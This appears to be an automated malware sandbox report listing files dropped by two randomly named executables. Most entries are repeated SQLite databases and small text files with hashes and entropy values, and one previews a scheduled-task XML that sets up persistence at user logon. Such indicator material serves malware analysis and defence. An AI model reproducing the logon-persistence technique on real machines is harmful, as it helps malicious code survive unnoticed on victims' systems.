                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1583
                    Entropy (8bit):5.106323257825316
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpaxvn:cgergYrFdOFzOzN33ODOiDdKrsuTpuv
                    MD5:39766B4AA3168A72ACCA756EA2737FE0
                    SHA1:099DABEC596D6157E46EF7C86E72B0B979F018EA
                    SHA-256:3947CB85CC890D9F03CB448E3466C6F66E861D72F550DEA44D39B0047725CF07
                    SHA-512:FE1DAA54774FC8643AA3B2DEA04D7D65B5A72C94FB941E840A1B330F62551379F7865B0593B21A7590FF17964C6C11F4C2383D4AAE888932A8C049FC4A4798F0
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
